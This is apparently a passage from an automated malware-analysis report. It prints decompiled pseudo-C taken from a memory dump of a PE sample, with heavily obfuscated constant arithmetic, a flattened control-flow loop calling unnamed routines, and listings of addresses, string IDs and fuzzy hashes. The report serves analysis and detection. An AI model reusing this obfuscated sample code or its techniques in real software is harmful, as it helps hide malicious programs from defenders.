                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                    				signed int _v84;
                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                    				signed int _v96;
                                                                                                                                                                                                                    				signed int _v100;
                                                                                                                                                                                                                    				unsigned int _v104;
                                                                                                                                                                                                                    				signed int _v108;
                                                                                                                                                                                                                    				signed int _v112;
                                                                                                                                                                                                                    				signed int _v116;
                                                                                                                                                                                                                    				signed int _v120;
                                                                                                                                                                                                                    				signed int _v124;
                                                                                                                                                                                                                    				signed int _v128;
                                                                                                                                                                                                                    				signed int _v132;
                                                                                                                                                                                                                    				signed int _v136;
                                                                                                                                                                                                                    				signed int _v140;
                                                                                                                                                                                                                    				signed int _v144;
                                                                                                                                                                                                                    				signed int _v148;
                                                                                                                                                                                                                    				signed int _v152;
                                                                                                                                                                                                                    				signed int _v156;
                                                                                                                                                                                                                    				signed int _v160;
                                                                                                                                                                                                                    				signed int _v164;
                                                                                                                                                                                                                    				signed int _v168;
                                                                                                                                                                                                                    				void* _t379;
                                                                                                                                                                                                                    				void* _t388;
                                                                                                                                                                                                                    				void* _t396;
                                                                                                                                                                                                                    				signed int _t399;
                                                                                                                                                                                                                    				signed int _t400;
                                                                                                                                                                                                                    				signed int _t401;
                                                                                                                                                                                                                    				signed int _t402;
                                                                                                                                                                                                                    				signed int _t403;
                                                                                                                                                                                                                    				signed int _t404;
                                                                                                                                                                                                                    				intOrPtr* _t443;
                                                                                                                                                                                                                    				signed int _t445;
                                                                                                                                                                                                                    				void* _t448;
                                                                                                                                                                                                                    				signed int* _t449;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t449 =  &_v168;
                                                                                                                                                                                                                    				_t443 = __ecx;
                                                                                                                                                                                                                    				_v4 = __ecx;
                                                                                                                                                                                                                    				_v112 = 0x797ecd;
                                                                                                                                                                                                                    				_v112 = _v112 | 0xf5f7e7ed;
                                                                                                                                                                                                                    				_v112 = _v112 ^ 0xf5ffffed;
                                                                                                                                                                                                                    				_v104 = 0x3b9967;
                                                                                                                                                                                                                    				_v104 = _v104 ^ 0x3d210022;
                                                                                                                                                                                                                    				_v104 = _v104 >> 0xb;
                                                                                                                                                                                                                    				_v104 = _v104 ^ 0x0007a353;
                                                                                                                                                                                                                    				_v100 = 0x550fa9;
                                                                                                                                                                                                                    				_v100 = _v100 >> 0x10;
                                                                                                                                                                                                                    				_v100 = _v100 + 0xffff3b49;
                                                                                                                                                                                                                    				_v100 = _v100 ^ 0xffff3b9e;
                                                                                                                                                                                                                    				_v84 = 0x84f2b;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0x6be83dcb;
                                                                                                                                                                                                                    				_v84 = _v84 * 0x75;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0x4d948060;
                                                                                                                                                                                                                    				_t448 = 0;
                                                                                                                                                                                                                    				_v116 = 0x4d5382;
                                                                                                                                                                                                                    				_t396 = 0x45e5271;
                                                                                                                                                                                                                    				_t399 = 0x5a;
                                                                                                                                                                                                                    				_v116 = _v116 / _t399;
                                                                                                                                                                                                                    				_v116 = _v116 ^ 0xb5bfc42b;
                                                                                                                                                                                                                    				_v116 = _v116 ^ 0xb5bf1fd8;
                                                                                                                                                                                                                    				_v156 = 0xed9575;
                                                                                                                                                                                                                    				_v156 = _v156 | 0x77f5cde5;
                                                                                                                                                                                                                    				_v156 = _v156 + 0xffff6fb8;
                                                                                                                                                                                                                    				_t445 = 0x42;
                                                                                                                                                                                                                    				_v156 = _v156 / _t445;
                                                                                                                                                                                                                    				_v156 = _v156 ^ 0x01d31835;
                                                                                                                                                                                                                    				_v132 = 0xae573;
                                                                                                                                                                                                                    				_t53 =  &_v132; // 0xae573
                                                                                                                                                                                                                    				_t400 = 0x75;
                                                                                                                                                                                                                    				_v132 =  *_t53 * 0x13;
                                                                                                                                                                                                                    				_v132 = _v132 + 0x36a5;
                                                                                                                                                                                                                    				_v132 = _v132 + 0xffffcc86;
                                                                                                                                                                                                                    				_v132 = _v132 ^ 0x00c2258e;
                                                                                                                                                                                                                    				_v56 = 0x233057;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x97537ad2;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x9774a96a;
                                                                                                                                                                                                                    				_v164 = 0xdec973;
                                                                                                                                                                                                                    				_v164 = _v164 / _t400;
                                                                                                                                                                                                                    				_v164 = _v164 + 0xffffba46;
                                                                                                                                                                                                                    				_v164 = _v164 + 0x445;
                                                                                                                                                                                                                    				_v164 = _v164 ^ 0x00026555;
                                                                                                                                                                                                                    				_v48 = 0x48951f;
                                                                                                                                                                                                                    				_v48 = _v48 | 0x094953d4;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x09412344;
                                                                                                                                                                                                                    				_v68 = 0x590ab8;
                                                                                                                                                                                                                    				_v68 = _v68 >> 2;
                                                                                                                                                                                                                    				_v68 = _v68 + 0xffff1ae1;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x001599e3;
                                                                                                                                                                                                                    				_v72 = 0xefa7cb;
                                                                                                                                                                                                                    				_v72 = _v72 + 0x5c43;
                                                                                                                                                                                                                    				_v72 = _v72 * 0x47;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x4290bae7;
                                                                                                                                                                                                                    				_v140 = 0x391bc5;
                                                                                                                                                                                                                    				_v140 = _v140 << 0xa;
                                                                                                                                                                                                                    				_v140 = _v140 + 0xffff3de6;
                                                                                                                                                                                                                    				_v140 = _v140 + 0xffff4cdd;
                                                                                                                                                                                                                    				_v140 = _v140 ^ 0xe467e8ec;
                                                                                                                                                                                                                    				_v40 = 0x634437;
                                                                                                                                                                                                                    				_v40 = _v40 + 0xffff381e;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x00631b86;
                                                                                                                                                                                                                    				_v60 = 0x86f056;
                                                                                                                                                                                                                    				_v60 = _v60 >> 5;
                                                                                                                                                                                                                    				_t401 = 0x5f;
                                                                                                                                                                                                                    				_v60 = _v60 * 5;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x001cc1a2;
                                                                                                                                                                                                                    				_v24 = 0x3361e1;
                                                                                                                                                                                                                    				_v24 = _v24 + 0xffffb77f;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x003af04f;
                                                                                                                                                                                                                    				_v96 = 0xf45194;
                                                                                                                                                                                                                    				_v96 = _v96 >> 3;
                                                                                                                                                                                                                    				_v96 = _v96 * 0x2e;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0x057f5231;
                                                                                                                                                                                                                    				_v80 = 0xecd5c2;
                                                                                                                                                                                                                    				_v80 = _v80 + 0xffff248c;
                                                                                                                                                                                                                    				_v80 = _v80 << 0x10;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0xfa49582d;
                                                                                                                                                                                                                    				_v148 = 0x9ed6fd;
                                                                                                                                                                                                                    				_v148 = _v148 + 0xffff2ed7;
                                                                                                                                                                                                                    				_v148 = _v148 + 0xb0e2;
                                                                                                                                                                                                                    				_v148 = _v148 >> 9;
                                                                                                                                                                                                                    				_v148 = _v148 ^ 0x000a02f5;
                                                                                                                                                                                                                    				_v88 = 0xf893f4;
                                                                                                                                                                                                                    				_v88 = _v88 * 0x2b;
                                                                                                                                                                                                                    				_v88 = _v88 + 0x3ee1;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0x29caefcc;
                                                                                                                                                                                                                    				_v168 = 0x8fdafd;
                                                                                                                                                                                                                    				_v168 = _v168 + 0x6268;
                                                                                                                                                                                                                    				_v168 = _v168 + 0xe28c;
                                                                                                                                                                                                                    				_v168 = _v168 + 0x1a9f;
                                                                                                                                                                                                                    				_v168 = _v168 ^ 0x009d5807;
                                                                                                                                                                                                                    				_v64 = 0x11f513;
                                                                                                                                                                                                                    				_v64 = _v64 / _t401;
                                                                                                                                                                                                                    				_v64 = _v64 / _t445;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x000bb70d;
                                                                                                                                                                                                                    				_v124 = 0x11d37c;
                                                                                                                                                                                                                    				_v124 = _v124 + 0xffff43c0;
                                                                                                                                                                                                                    				_v124 = _v124 + 0x64da;
                                                                                                                                                                                                                    				_v124 = _v124 ^ 0x001621df;
                                                                                                                                                                                                                    				_v160 = 0x100579;
                                                                                                                                                                                                                    				_v160 = _v160 ^ 0x3e2681a1;
                                                                                                                                                                                                                    				_v160 = _v160 >> 7;
                                                                                                                                                                                                                    				_v160 = _v160 << 7;
                                                                                                                                                                                                                    				_v160 = _v160 ^ 0x3e35fae7;
                                                                                                                                                                                                                    				_v32 = 0x6e8831;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0xc4845827;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0xc4e74552;
                                                                                                                                                                                                                    				_v12 = 0x4ddf18;
                                                                                                                                                                                                                    				_t402 = 0xe;
                                                                                                                                                                                                                    				_v12 = _v12 / _t402;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x00035684;
                                                                                                                                                                                                                    				_v36 = 0xcffe29;
                                                                                                                                                                                                                    				_v36 = _v36 + 0xffffbb10;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x00c6a3c4;
                                                                                                                                                                                                                    				_v44 = 0x5e9cbb;
                                                                                                                                                                                                                    				_v44 = _v44 >> 0x10;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x000643b1;
                                                                                                                                                                                                                    				_v152 = 0xd58210;
                                                                                                                                                                                                                    				_v152 = _v152 | 0x370a6b4f;
                                                                                                                                                                                                                    				_v152 = _v152 >> 4;
                                                                                                                                                                                                                    				_v152 = _v152 | 0xa697d1a9;
                                                                                                                                                                                                                    				_v152 = _v152 ^ 0xa7f3ed6c;
                                                                                                                                                                                                                    				_v52 = 0xbf84f6;
                                                                                                                                                                                                                    				_v52 = _v52 << 6;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x2fe08275;
                                                                                                                                                                                                                    				_v92 = 0xdfefb6;
                                                                                                                                                                                                                    				_t403 = 0x62;
                                                                                                                                                                                                                    				_v92 = _v92 / _t403;
                                                                                                                                                                                                                    				_t404 = 0x3e;
                                                                                                                                                                                                                    				_v92 = _v92 * 0x6f;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0x00f297da;
                                                                                                                                                                                                                    				_v16 = 0x603364;
                                                                                                                                                                                                                    				_v16 = _v16 + 0x6f6c;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x006478ba;
                                                                                                                                                                                                                    				_v108 = 0xed3e42;
                                                                                                                                                                                                                    				_v108 = _v108 | 0xeb8c4c08;
                                                                                                                                                                                                                    				_v108 = _v108 + 0x39fb;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0xebed458f;
                                                                                                                                                                                                                    				_v144 = 0xb20136;
                                                                                                                                                                                                                    				_v144 = _v144 ^ 0x0a50208c;
                                                                                                                                                                                                                    				_v144 = _v144 >> 6;
                                                                                                                                                                                                                    				_v144 = _v144 * 0x2c;
                                                                                                                                                                                                                    				_v144 = _v144 ^ 0x0771c8cc;
                                                                                                                                                                                                                    				_v120 = 0xe692df;
                                                                                                                                                                                                                    				_v120 = _v120 | 0xa91fdeb8;
                                                                                                                                                                                                                    				_v120 = _v120 ^ 0xfadeef3e;
                                                                                                                                                                                                                    				_v120 = _v120 ^ 0x5327ed5e;
                                                                                                                                                                                                                    				_v76 = 0xccd7ed;
                                                                                                                                                                                                                    				_v76 = _v76 + 0x15f7;
                                                                                                                                                                                                                    				_v76 = _v76 << 0xe;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x3b7162ba;
                                                                                                                                                                                                                    				_v20 = 0x16a598;
                                                                                                                                                                                                                    				_v20 = _v20 >> 3;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x0007270d;
                                                                                                                                                                                                                    				_v128 = 0xe91861;
                                                                                                                                                                                                                    				_v128 = _v128 | 0xbd7c8588;
                                                                                                                                                                                                                    				_v128 = _v128 + 0x30d6;
                                                                                                                                                                                                                    				_v128 = _v128 | 0x661fa290;
                                                                                                                                                                                                                    				_v128 = _v128 ^ 0xfff19c0f;
                                                                                                                                                                                                                    				_v136 = 0xe7e2f9;
                                                                                                                                                                                                                    				_v136 = _v136 + 0x3330;
                                                                                                                                                                                                                    				_v136 = _v136 >> 0xb;
                                                                                                                                                                                                                    				_v136 = _v136 / _t404;
                                                                                                                                                                                                                    				_t379 = 0x4212499;
                                                                                                                                                                                                                    				_v136 = _v136 ^ 0x000aeb55;
                                                                                                                                                                                                                    				_v28 = 0xe6bcc3;
                                                                                                                                                                                                                    				_v28 = _v28 >> 7;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x000d1fb1;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t396 != _t379) {
                                                                                                                                                                                                                    						if(_t396 == 0x45e5271) {
                                                                                                                                                                                                                    							_t396 = 0xde3a5e3;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t396 == 0x6faa1db) {
                                                                                                                                                                                                                    								E00A62984(_v20, _v116, _v128, _v136, _v28, _v8);
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								_t456 = _t396 - 0xde3a5e3;
                                                                                                                                                                                                                    								if(_t396 == 0xde3a5e3) {
                                                                                                                                                                                                                    									_push(_v164);
                                                                                                                                                                                                                    									_push(_v56);
                                                                                                                                                                                                                    									_push(_v132);
                                                                                                                                                                                                                    									_t388 = E00A81E60(0xa6151c, _v156, _t456);
                                                                                                                                                                                                                    									_push(_v140);
                                                                                                                                                                                                                    									_push(_v72);
                                                                                                                                                                                                                    									_push(_v68);
                                                                                                                                                                                                                    									E00A7EBA2(_v40, E00A81E60(0xa6146c, _v48, _t456), _v60, _v112, _t388,  &_v8, _v24);
                                                                                                                                                                                                                    									_t396 =  ==  ? 0x4212499 : 0xb28870b;
                                                                                                                                                                                                                    									E00A7D6DF(_v96, _t388, _v80, _v148);
                                                                                                                                                                                                                    									E00A7D6DF(_v88, _t389, _v168, _v64);
                                                                                                                                                                                                                    									_t443 = _v4;
                                                                                                                                                                                                                    									_t449 =  &(_t449[0xf]);
                                                                                                                                                                                                                    									L8:
                                                                                                                                                                                                                    									_t379 = 0x4212499;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						L12:
                                                                                                                                                                                                                    						return _t448;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_push(_v12);
                                                                                                                                                                                                                    					_push(_v32);
                                                                                                                                                                                                                    					_push(_v160);
                                                                                                                                                                                                                    					__eflags = E00A69EA6( *((intOrPtr*)(_t443 + 4)), _v36, 0xa6144c, _v44, _v8,  *0xa83208 + 4, _v152,  *_t443, _v52, _v92, _v100, _v16, E00A81E60(0xa6144c, _v124, __eflags), _v108) - _v84;
                                                                                                                                                                                                                    					_t396 = 0x6faa1db;
                                                                                                                                                                                                                    					_t448 =  ==  ? 1 : _t448;
                                                                                                                                                                                                                    					E00A7D6DF(_v144, _t380, _v120, _v76);
                                                                                                                                                                                                                    					_t449 =  &(_t449[0x11]);
                                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                    				} while (_t396 != 0xb28870b);
                                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                                    			}


























































                                                                                                                                                                                                                    0x00a6610e
                                                                                                                                                                                                                    0x00a66118
                                                                                                                                                                                                                    0x00a6611a
                                                                                                                                                                                                                    0x00a66121
                                                                                                                                                                                                                    0x00a6612b
                                                                                                                                                                                                                    0x00a66133
                                                                                                                                                                                                                    0x00a6613b
                                                                                                                                                                                                                    0x00a66143
                                                                                                                                                                                                                    0x00a6614b
                                                                                                                                                                                                                    0x00a66150
                                                                                                                                                                                                                    0x00a66158
                                                                                                                                                                                                                    0x00a66160
                                                                                                                                                                                                                    0x00a66165
                                                                                                                                                                                                                    0x00a6616d
                                                                                                                                                                                                                    0x00a66175
                                                                                                                                                                                                                    0x00a6617d
                                                                                                                                                                                                                    0x00a6618a
                                                                                                                                                                                                                    0x00a6618e
                                                                                                                                                                                                                    0x00a66196
                                                                                                                                                                                                                    0x00a66198
                                                                                                                                                                                                                    0x00a661a0
                                                                                                                                                                                                                    0x00a661ab
                                                                                                                                                                                                                    0x00a661b0
                                                                                                                                                                                                                    0x00a661b6
                                                                                                                                                                                                                    0x00a661be
                                                                                                                                                                                                                    0x00a661c6
                                                                                                                                                                                                                    0x00a661ce
                                                                                                                                                                                                                    0x00a661d6
                                                                                                                                                                                                                    0x00a661e2
                                                                                                                                                                                                                    0x00a661e7
                                                                                                                                                                                                                    0x00a661ed
                                                                                                                                                                                                                    0x00a661f5
                                                                                                                                                                                                                    0x00a661fd
                                                                                                                                                                                                                    0x00a66202
                                                                                                                                                                                                                    0x00a66203
                                                                                                                                                                                                                    0x00a66207
                                                                                                                                                                                                                    0x00a6620f
                                                                                                                                                                                                                    0x00a66217
                                                                                                                                                                                                                    0x00a6621f
                                                                                                                                                                                                                    0x00a6622a
                                                                                                                                                                                                                    0x00a66235
                                                                                                                                                                                                                    0x00a66240
                                                                                                                                                                                                                    0x00a6624e
                                                                                                                                                                                                                    0x00a66252
                                                                                                                                                                                                                    0x00a6625a
                                                                                                                                                                                                                    0x00a66262
                                                                                                                                                                                                                    0x00a6626a
                                                                                                                                                                                                                    0x00a66275
                                                                                                                                                                                                                    0x00a66280
                                                                                                                                                                                                                    0x00a6628b
                                                                                                                                                                                                                    0x00a66293
                                                                                                                                                                                                                    0x00a66298
                                                                                                                                                                                                                    0x00a662a0
                                                                                                                                                                                                                    0x00a662a8
                                                                                                                                                                                                                    0x00a662b0
                                                                                                                                                                                                                    0x00a662bd
                                                                                                                                                                                                                    0x00a662c1
                                                                                                                                                                                                                    0x00a662c9
                                                                                                                                                                                                                    0x00a662d1
                                                                                                                                                                                                                    0x00a662d6
                                                                                                                                                                                                                    0x00a662de
                                                                                                                                                                                                                    0x00a662e6
                                                                                                                                                                                                                    0x00a662ee
                                                                                                                                                                                                                    0x00a662f9
                                                                                                                                                                                                                    0x00a66304
                                                                                                                                                                                                                    0x00a66311
                                                                                                                                                                                                                    0x00a66319
                                                                                                                                                                                                                    0x00a66325
                                                                                                                                                                                                                    0x00a66328
                                                                                                                                                                                                                    0x00a6632f
                                                                                                                                                                                                                    0x00a6633a
                                                                                                                                                                                                                    0x00a66345
                                                                                                                                                                                                                    0x00a66350
                                                                                                                                                                                                                    0x00a6635b
                                                                                                                                                                                                                    0x00a66363
                                                                                                                                                                                                                    0x00a6636d
                                                                                                                                                                                                                    0x00a66371
                                                                                                                                                                                                                    0x00a66379
                                                                                                                                                                                                                    0x00a66381
                                                                                                                                                                                                                    0x00a66389
                                                                                                                                                                                                                    0x00a6638e
                                                                                                                                                                                                                    0x00a66396
                                                                                                                                                                                                                    0x00a6639e
                                                                                                                                                                                                                    0x00a663a6
                                                                                                                                                                                                                    0x00a663ae
                                                                                                                                                                                                                    0x00a663b3
                                                                                                                                                                                                                    0x00a663bb
                                                                                                                                                                                                                    0x00a663c8
                                                                                                                                                                                                                    0x00a663cc
                                                                                                                                                                                                                    0x00a663d4
                                                                                                                                                                                                                    0x00a663dc
                                                                                                                                                                                                                    0x00a663e4
                                                                                                                                                                                                                    0x00a663ec
                                                                                                                                                                                                                    0x00a663f4
                                                                                                                                                                                                                    0x00a663fc
                                                                                                                                                                                                                    0x00a66404
                                                                                                                                                                                                                    0x00a66414
                                                                                                                                                                                                                    0x00a66420
                                                                                                                                                                                                                    0x00a66424
                                                                                                                                                                                                                    0x00a6642c
                                                                                                                                                                                                                    0x00a66434
                                                                                                                                                                                                                    0x00a6643c
                                                                                                                                                                                                                    0x00a66444
                                                                                                                                                                                                                    0x00a6644c
                                                                                                                                                                                                                    0x00a66454
                                                                                                                                                                                                                    0x00a6645c
                                                                                                                                                                                                                    0x00a66461
                                                                                                                                                                                                                    0x00a66466
                                                                                                                                                                                                                    0x00a6646e
                                                                                                                                                                                                                    0x00a66479
                                                                                                                                                                                                                    0x00a66484
                                                                                                                                                                                                                    0x00a6648f
                                                                                                                                                                                                                    0x00a664a1
                                                                                                                                                                                                                    0x00a664a4
                                                                                                                                                                                                                    0x00a664ab
                                                                                                                                                                                                                    0x00a664b6
                                                                                                                                                                                                                    0x00a664c1
                                                                                                                                                                                                                    0x00a664cc
                                                                                                                                                                                                                    0x00a664d7
                                                                                                                                                                                                                    0x00a664e2
                                                                                                                                                                                                                    0x00a664ea
                                                                                                                                                                                                                    0x00a664f5
                                                                                                                                                                                                                    0x00a664fd
                                                                                                                                                                                                                    0x00a66505
                                                                                                                                                                                                                    0x00a6650a
                                                                                                                                                                                                                    0x00a66512
                                                                                                                                                                                                                    0x00a6651a
                                                                                                                                                                                                                    0x00a66525
                                                                                                                                                                                                                    0x00a6652d
                                                                                                                                                                                                                    0x00a66538
                                                                                                                                                                                                                    0x00a66548
                                                                                                                                                                                                                    0x00a6654d
                                                                                                                                                                                                                    0x00a66558
                                                                                                                                                                                                                    0x00a66559
                                                                                                                                                                                                                    0x00a6655d
                                                                                                                                                                                                                    0x00a66565
                                                                                                                                                                                                                    0x00a66570
                                                                                                                                                                                                                    0x00a6657b
                                                                                                                                                                                                                    0x00a66586
                                                                                                                                                                                                                    0x00a6658e
                                                                                                                                                                                                                    0x00a66596
                                                                                                                                                                                                                    0x00a6659e
                                                                                                                                                                                                                    0x00a665a6
                                                                                                                                                                                                                    0x00a665ae
                                                                                                                                                                                                                    0x00a665b6
                                                                                                                                                                                                                    0x00a665c0
                                                                                                                                                                                                                    0x00a665c4
                                                                                                                                                                                                                    0x00a665cc
                                                                                                                                                                                                                    0x00a665d4
                                                                                                                                                                                                                    0x00a665dc
                                                                                                                                                                                                                    0x00a665e4
                                                                                                                                                                                                                    0x00a665ec
                                                                                                                                                                                                                    0x00a665f4
                                                                                                                                                                                                                    0x00a665fc
                                                                                                                                                                                                                    0x00a66601
                                                                                                                                                                                                                    0x00a66609
                                                                                                                                                                                                                    0x00a66614
                                                                                                                                                                                                                    0x00a6661c
                                                                                                                                                                                                                    0x00a66627
                                                                                                                                                                                                                    0x00a6662f
                                                                                                                                                                                                                    0x00a66637
                                                                                                                                                                                                                    0x00a6663f
                                                                                                                                                                                                                    0x00a66647
                                                                                                                                                                                                                    0x00a6664f
                                                                                                                                                                                                                    0x00a66657
                                                                                                                                                                                                                    0x00a6665f
                                                                                                                                                                                                                    0x00a6666a
                                                                                                                                                                                                                    0x00a6666e
                                                                                                                                                                                                                    0x00a66673
                                                                                                                                                                                                                    0x00a6667b
                                                                                                                                                                                                                    0x00a66686
                                                                                                                                                                                                                    0x00a6668e
                                                                                                                                                                                                                    0x00a66699
                                                                                                                                                                                                                    0x00a66699
                                                                                                                                                                                                                    0x00a666a7
                                                                                                                                                                                                                    0x00a66788
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a666ad
                                                                                                                                                                                                                    0x00a666b3
                                                                                                                                                                                                                    0x00a66862
                                                                                                                                                                                                                    0x00a666b9
                                                                                                                                                                                                                    0x00a666b9
                                                                                                                                                                                                                    0x00a666bf
                                                                                                                                                                                                                    0x00a666c5
                                                                                                                                                                                                                    0x00a666ce
                                                                                                                                                                                                                    0x00a666d5
                                                                                                                                                                                                                    0x00a666dd
                                                                                                                                                                                                                    0x00a666e2
                                                                                                                                                                                                                    0x00a666ed
                                                                                                                                                                                                                    0x00a666f4
                                                                                                                                                                                                                    0x00a6672d
                                                                                                                                                                                                                    0x00a66758
                                                                                                                                                                                                                    0x00a6675b
                                                                                                                                                                                                                    0x00a66774
                                                                                                                                                                                                                    0x00a66779
                                                                                                                                                                                                                    0x00a66780
                                                                                                                                                                                                                    0x00a6682e
                                                                                                                                                                                                                    0x00a6682e
                                                                                                                                                                                                                    0x00a6682e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a666bf
                                                                                                                                                                                                                    0x00a666b3
                                                                                                                                                                                                                    0x00a6686c
                                                                                                                                                                                                                    0x00a66876
                                                                                                                                                                                                                    0x00a66876
                                                                                                                                                                                                                    0x00a66792
                                                                                                                                                                                                                    0x00a6679e
                                                                                                                                                                                                                    0x00a667a5
                                                                                                                                                                                                                    0x00a66812
                                                                                                                                                                                                                    0x00a66814
                                                                                                                                                                                                                    0x00a66821
                                                                                                                                                                                                                    0x00a66826
                                                                                                                                                                                                                    0x00a6682b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a66833
                                                                                                                                                                                                                    0x00a66833
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: "$7Dc$B>$C\$D#A$Ok7$U$Ug$W0#$^'S$d3`$hb$lo$s$>$a3$g
                                                                                                                                                                                                                    • API String ID: 0-4255642578
                                                                                                                                                                                                                    • Opcode ID: c704b3eca9eb111a17b55d5a482360c8e6483906d6b55157bdbbf01da49ab79f
                                                                                                                                                                                                                    • Instruction ID: 66321955f184e10669a533c6d543a6e9731caab789b3b6cfc34794b7253452e8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c704b3eca9eb111a17b55d5a482360c8e6483906d6b55157bdbbf01da49ab79f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3020F715087809FD368CF25D58AA4BBBF2FBC4718F508A1DE6DA96260D7B58909CF03
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                    			E00A633B5(intOrPtr* __ecx) {
                                                                                                                                                                                                                    				char _v68;
                                                                                                                                                                                                                    				char _v76;
                                                                                                                                                                                                                    				intOrPtr _v80;
                                                                                                                                                                                                                    				intOrPtr _v84;
                                                                                                                                                                                                                    				intOrPtr _v88;
                                                                                                                                                                                                                    				intOrPtr _v92;
                                                                                                                                                                                                                    				void _v96;
                                                                                                                                                                                                                    				intOrPtr _v100;
                                                                                                                                                                                                                    				intOrPtr* _v104;
                                                                                                                                                                                                                    				char _v108;
                                                                                                                                                                                                                    				char _v112;
                                                                                                                                                                                                                    				char _v116;
                                                                                                                                                                                                                    				char _v120;
                                                                                                                                                                                                                    				char _v124;
                                                                                                                                                                                                                    				char _v128;
                                                                                                                                                                                                                    				signed int _v132;
                                                                                                                                                                                                                    				signed int _v136;
                                                                                                                                                                                                                    				signed int _v140;
                                                                                                                                                                                                                    				signed int _v144;
                                                                                                                                                                                                                    				signed int _v148;
                                                                                                                                                                                                                    				signed int _v152;
                                                                                                                                                                                                                    				signed int _v156;
                                                                                                                                                                                                                    				signed int _v160;
                                                                                                                                                                                                                    				signed int _v164;
                                                                                                                                                                                                                    				signed int _v168;
                                                                                                                                                                                                                    				signed int _v172;
                                                                                                                                                                                                                    				signed int _v176;
                                                                                                                                                                                                                    				signed int _v180;
                                                                                                                                                                                                                    				signed int _v184;
                                                                                                                                                                                                                    				signed int _v188;
                                                                                                                                                                                                                    				signed int _v192;
                                                                                                                                                                                                                    				signed int _v196;
                                                                                                                                                                                                                    				signed int _v200;
                                                                                                                                                                                                                    				signed int _v204;
                                                                                                                                                                                                                    				signed int _v208;
                                                                                                                                                                                                                    				signed int _v212;
                                                                                                                                                                                                                    				signed int _v216;
                                                                                                                                                                                                                    				signed int _v220;
                                                                                                                                                                                                                    				signed int _v224;
                                                                                                                                                                                                                    				signed int _v228;
                                                                                                                                                                                                                    				signed int _v232;
                                                                                                                                                                                                                    				signed int _v236;
                                                                                                                                                                                                                    				signed int _v240;
                                                                                                                                                                                                                    				signed int _v244;
                                                                                                                                                                                                                    				signed int _v248;
                                                                                                                                                                                                                    				signed int _v252;
                                                                                                                                                                                                                    				signed int _v256;
                                                                                                                                                                                                                    				signed int _v260;
                                                                                                                                                                                                                    				signed int _v264;
                                                                                                                                                                                                                    				signed int _v268;
                                                                                                                                                                                                                    				signed int _v272;
                                                                                                                                                                                                                    				signed int _v276;
                                                                                                                                                                                                                    				signed int _v280;
                                                                                                                                                                                                                    				signed int _v284;
                                                                                                                                                                                                                    				signed int _v288;
                                                                                                                                                                                                                    				signed int _v292;
                                                                                                                                                                                                                    				signed int _v296;
                                                                                                                                                                                                                    				signed int _v300;
                                                                                                                                                                                                                    				signed int _v304;
                                                                                                                                                                                                                    				signed int _v308;
                                                                                                                                                                                                                    				signed int _v312;
                                                                                                                                                                                                                    				signed int _v316;
                                                                                                                                                                                                                    				signed int _v320;
                                                                                                                                                                                                                    				signed int _v324;
                                                                                                                                                                                                                    				signed int _v328;
                                                                                                                                                                                                                    				signed int _v332;
                                                                                                                                                                                                                    				signed int _v336;
                                                                                                                                                                                                                    				signed int _v340;
                                                                                                                                                                                                                    				signed int _v344;
                                                                                                                                                                                                                    				signed int _v348;
